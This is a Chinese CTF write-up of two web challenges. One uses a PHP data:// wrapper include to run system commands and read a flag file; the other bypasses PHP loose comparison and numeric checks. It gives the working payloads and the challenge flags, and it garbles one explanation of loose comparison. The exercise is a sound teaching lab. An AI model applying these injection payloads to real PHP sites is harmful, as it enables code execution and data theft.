攻防世界-Web题目2(弱比较、php伪协议)

目录

Web_php_include

1、题目

2、知识点

3、思路

simple_php

4、题目

5、知识点

6、思路

Web_php_include

1、题目
2、知识点

php伪协议

3、思路

审计源代码

需要我们上传一个page参数,但是对参数内容进行过滤,

page=str_replace("php://", "", page); 意思是将php://替换成空,

看到这个,联想到使用php伪协议,既然这个协议被过滤,那就用其他协议

使用data://协议,

data://text/plain,<?php phpinfo();?>

payload:

/?page=data://text/plain,<?php%20system("ls");?>

?page=data://text/plain,<?php%20system("cat%20fl4gisisish3r3.php");?>

右键查看源代码得到flag

flag:

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}


simple_php

4、题目
5、知识点

弱比较,数组绕过

6、思路

审计源代码,需要我们GET上传a,b两个变量,

if(a==0 and a) 意思是a与0进行弱比较且不等于0,否则条件不成立

弱比较:只比较类型,不比较类型,也就是我们可以使a=字符串,字符串与0进行弱比较时会进行类型转化

payload:?a="sss"
if(is_numeric($b)){ exit(); } 意思是如果b是数字则结束程序

if($b>1234) b需要大于1234

可以采用数组进行绕过,或者数字加字符串的形式

b[]=1234 或者b=2222a

完整payload:?a="sss"&b=2222a

得到payload:Cyberpeace{647E37C7627CC3E4019EC69324F66C7C}


这篇文章就先写到这里了,哪里不懂的或者哪里不足的欢迎指出

相关推荐
Suckerbin1 小时前
LAMPSecurity: CTF5靶场渗透
笔记·安全·web安全·网络安全
李白你好3 小时前
CyberPoC 是一个现代化的网络安全练习和竞赛平台,支持容器化部署的安全挑战,为用户提供实践网络安全技能的环境。
web安全
悠悠~飘5 小时前
php简介(第一天打卡)
php
心 一8 小时前
Web安全基石:深入理解与防御SQL注入漏洞
sql·安全·web安全
久绊A8 小时前
Hydra-SSH 破解安全防范
开发语言·php
黑白世界46488 小时前
开源分享: php-tools php gui的一次尝试
后端·php
2503_9284115612 小时前
9.8 ajax+php基础语法
ajax·okhttp·php
KKKlucifer12 小时前
网络安全等级保护:等级保护工作、分级保护工作、密码管理工作三者之间的关系
网络·安全·web安全
普通网友14 小时前
支持二次开发的代练App源码:订单管理、代练监控、安全护航功能齐全,一站式解决代练护航平台源码(PHP+ Uni-app)
安全·uni-app·php
Suckerbin14 小时前
LAMPSecurity: CTF6靶场渗透
笔记·安全·web安全·网络安全